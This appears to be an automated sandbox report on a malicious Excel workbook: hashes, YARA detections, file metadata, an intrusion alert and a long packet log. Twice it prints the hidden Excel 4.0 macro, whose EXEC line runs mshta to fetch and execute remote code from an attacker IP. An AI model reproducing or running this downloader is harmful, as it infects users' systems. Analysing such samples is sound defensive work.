                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:mY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+82:mY+nBqmIk3hbdlylKsgqopeJBWhZFGk0
                                                                                                                    MD5:A018CC966C33496CFF077ABC3DAF17DF
                                                                                                                    SHA1:D58C223830595260C541145D65470976089070EF
                                                                                                                    SHA-256:463CD2CAF117E08BEC77B0F3FB7A6701F033C178588CDD80B053440B7A4BE474
                                                                                                                    SHA-512:A4008612AEDEBAC2DADE1394B498F3822A6AF08BBB693DAD2C29451DDC1EB18CDEBD47D50D4FB93F0278415FBA59156CEC358816FD7AC33C2FD35623C04A8276
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\80_513972285.xls, Author: John Lambert @JohnLaTwC
                                                                                                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\80_513972285.xls, Author: Joe Security
                                                                                                                    • Rule: INDICATOR_OLE_Excel4Macros_DL2, Description: Detects OLE Excel 4 Macros documents acting as downloaders, Source: C:\Users\user\Desktop\80_513972285.xls, Author: ditekSHen
                                                                                                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):557056
                                                                                                                    Entropy (8bit):7.0041232632621595
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:HUNF4UQXTkkAiBuGKDU5PSczbmOTT0DaTMGOUylbdTN1itwRClN6RfcjJxX4R0Zq:AeAa4DU5PSczbmmTzTn7yDx6BrWt
                                                                                                                    MD5:DF8A5542B86A487AD0C0581E11F0B5EB
                                                                                                                    SHA1:170867F21CA9A1B9CACC84336441449BAE0D4911
                                                                                                                    SHA-256:69DB5ABABB04BC8A6805647D738E69663ADDACF57AAD0CB9384B60804260A266
                                                                                                                    SHA-512:F8E739A1CCBF86AD6B694E4AF44121117373B775C262889F54EFDE52ECC439A358A9C148AD527490FACBA3EDA439F2379CF032B0E36C17CB4324C85C2BA28525
                                                                                                                    Malicious:false
                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 26 22:33:31 2022, Last Saved Time/Date: Wed Jan 26 22:36:27 2022, Security: 0
                                                                                                                    Entropy (8bit):5.808717628749656
                                                                                                                    TrID:
                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                    File name:80_513972285.xls
                                                                                                                    File size:77726
                                                                                                                    MD5:c130bfd7e7632f18fcd505d0991f192f
                                                                                                                    SHA1:da0d0031d5f6386f0df623a3c1cabfe4e9778f51
                                                                                                                    SHA256:eaad4c93a96bb50a79e024650ae4808afd7fddbd604cbc4048416ddcb20e6aae
                                                                                                                    SHA512:e82290b7464a50131ed10a6eb2cae1e1e97cefda42536765347451bfa53d1989613a126dfed99b2a885c0ebba8c7d20f73d6e2737f441a38a70a689dc6e2b026
                                                                                                                    SSDEEP:1536:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIiQ5gQ72IotO6nitSUPU+8:xY+nBqmIk3hbdlylKsgqopeJBWhZFGkZ
                                                                                                                    Icon Hash:e4eea286a4b4bcb4
                                                                                                                    Document Type:OLE
                                                                                                                    Number of OLE Files:1
                                                                                                                    Has Summary Info:True
                                                                                                                    Application Name:Microsoft Excel
                                                                                                                    Encrypted Document:False
                                                                                                                    Contains Word Document Stream:False
                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                    Contains Visio Document Stream:False
                                                                                                                    Contains ObjectPool Stream:
                                                                                                                    Flash Objects Count:
                                                                                                                    Contains VBA Macros:True
                                                                                                                    Code Page:1251
                                                                                                                    Author:xXx
                                                                                                                    Last Saved By:xXx
                                                                                                                    Create Time:2022-01-26 22:33:31
                                                                                                                    Last Saved Time:2022-01-26 22:36:27
                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                    Security:0
                                                                                                                    Document Code Page:1251
                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                    Company:
                                                                                                                    Contains Dirty Links:False
                                                                                                                    Shared Document:False
                                                                                                                    Changed Hyperlinks:False
                                                                                                                    Application Version:1048576
                                                                                                                    General
                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.347239233907
                                                                                                                    Base64 Encoded:False
                                                                                                                    General
                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                    File Type:data
                                                                                                                    Stream Size:4096
                                                                                                                    Entropy:0.264984368025
                                                                                                                    Base64 Encoded:False
                                                                                                                    General
                                                                                                                    Stream Path:Workbook
                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                    Stream Size:67009
                                                                                                                    Entropy:6.37385915268
                                                                                                                    Base64 Encoded:True
                                                                                                                    Name:Macro1
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
Macro1 3 False 0 False post
1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.
7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.
8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.
14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.
16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.
18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.
19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")
25,10,=HALT()
                                                                                                                    Name:Macro1
                                                                                                                    Type:3
                                                                                                                    Final:False
                                                                                                                    Visible:False
                                                                                                                    Protected:False
Macro1 3 False 0 False pre
1,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
3,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
5,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.
7,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.
8,10,' Lose away off why half led have near bed. At engage simple father of period others except. My giving do summer of though narrow marked at. Spring formal no county ye waited. My whether cheered at regular it of promise blushes perhaps. Uncommonly simplicity interested mr is be compliment projecting my inhabiting. Gentleman he september in oh excellent.
10,10,' On on produce colonel pointed. Just four sold need over how any. In to september suspicion determine he prevailed admitting. On adapted an as affixed limited on. Giving cousin warmly things no spring mr be abroad. Relation breeding be as repeated strictly followed margaret. One gravity son brought shyness waiting regular led ham.
12,10,' Supported neglected met she therefore unwilling discovery remainder. Way sentiments two indulgence uncommonly own. Diminution to frequently sentiments he connection continuing indulgence. An my exquisite conveying up defective. Shameless see the tolerably how continued. She enable men twenty elinor points appear. Whose merry ten yet was men seven ought balls.
14,10,' Now eldest new tastes plenty mother called misery get. Longer excuse for county nor except met its things. Narrow enough sex moment desire are. Hold who what come that seen read age its. Contained or estimable earnestly so perceived. Imprudence he in sufficient cultivated. Delighted promotion improving acuteness an newspaper offending he. Misery in am secure theirs giving an. Design on longer thrown oppose am.
16,10,' In post mean shot ye. There out her child sir his lived. Design at uneasy me season of branch on praise esteem. Abilities discourse believing consisted remaining to no. Mistaken no me denoting dashwood as screened. Whence or esteem easily he on. Dissuade husbands at of no if disposal.
18,10,' Excited him now natural saw passage offices you minuter. At by asked being court hopes. Farther so friends am to detract. Forbade concern do private be. Offending residence but men engrossed shy. Pretend am earnest offered arrived company so on. Felicity informed yet had admitted strictly how you.
19,10,=EXEC("cmd /c mshta http://91.240.118.168/qqw/aas/se.html")
25,10,=HALT()
Timestamp:01/28/22-21:24:47.819865
Protocol:TCP
SID:2034631
Message:ET TROJAN Maldoc Activity (set)
Source Port:49168
Dest Port:80
Source IP:192.168.2.22
Dest IP:91.240.118.168
Timestamp, Source Port, Dest Port, Source IP, Dest IP
                                                                                                                    Jan 28, 2022 21:24:48.031130075 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.031141996 CET8049169172.67.149.209192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.031183958 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:24:48.032617092 CET4916980192.168.2.22172.67.149.209
                                                                                                                    Jan 28, 2022 21:24:48.314838886 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.476866961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.476942062 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.477128983 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.640506983 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685756922 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685779095 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685797930 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685817003 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685838938 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685878992 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685899973 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685899973 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.685905933 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.685919046 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685937881 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685939074 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.685957909 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.685973883 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.686116934 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.847829103 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.847847939 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.847940922 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.853611946 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.853631020 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.853689909 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.865048885 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.865084887 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.865138054 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.876492977 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.876511097 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.876574039 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.887865067 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.887885094 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.887969017 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.899410963 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.899446964 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.899490118 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.910604954 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.910628080 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.910718918 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.921982050 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.922005892 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.922056913 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.933341980 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.933367014 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.933449030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:48.944802046 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.944828033 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:48.944977999 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.009958982 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.009994984 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.010195017 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.016185045 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.016225100 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.016339064 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.026963949 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.027000904 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.027045965 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.036767960 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.036803961 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.036875010 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.046566010 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.046602011 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.046758890 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.056385040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.056417942 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.056461096 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.066143036 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.066174984 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.066217899 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.075954914 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.075989008 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.076040030 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.085760117 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.085789919 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.085835934 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.095535040 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.095571041 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.095650911 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.105361938 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.105396986 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.105437994 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.115178108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.115210056 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.115271091 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.124799967 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.124835968 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.124883890 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.134381056 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.134416103 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.134496927 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.143477917 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.143508911 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.143553972 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.152501106 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.152539015 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.152585983 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.161552906 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.161587000 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.161631107 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.170659065 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.170697927 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.170747995 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.179747105 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.179790974 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.179842949 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.188762903 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.188798904 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.188837051 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.197881937 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.197932959 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.197973013 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.203200102 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.203236103 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.203279018 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.208580971 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.208621025 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.208883047 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.213962078 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.214000940 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.214046001 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.219278097 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.219316006 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.219356060 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.224606037 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.224643946 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.224692106 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.229934931 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.229970932 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.230015039 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.235030890 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.235069990 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.235220909 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.240206003 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.240245104 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.240288019 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.245273113 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.245304108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.245369911 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.250413895 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.250449896 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.250493050 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.255500078 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.255537033 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.255588055 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.260590076 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.599937916 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.600002050 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.602298975 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.602336884 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.602375031 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.604614973 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.604652882 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.604702950 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.606997013 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.607033968 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.607073069 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.609338999 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.609379053 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.609422922 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.611718893 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.611751080 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.611799955 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.614072084 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.614109039 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.614150047 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.616456032 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.616489887 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.616528034 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.618819952 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.618856907 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.618906021 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.621169090 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.621208906 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.621329069 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.623543024 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.623579979 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.623626947 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.625890970 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.625922918 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.625973940 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.628258944 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.628297091 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.628340960 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.630614996 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.630655050 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.630695105 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.632983923 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.633021116 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.633059978 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.635332108 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.635366917 CET804917074.208.236.157192.168.2.22
                                                                                                                    Jan 28, 2022 21:24:49.635407925 CET4917080192.168.2.2274.208.236.157
                                                                                                                    Jan 28, 2022 21:24:49.637788057 CET804917074.208.236.157192.168.2.22
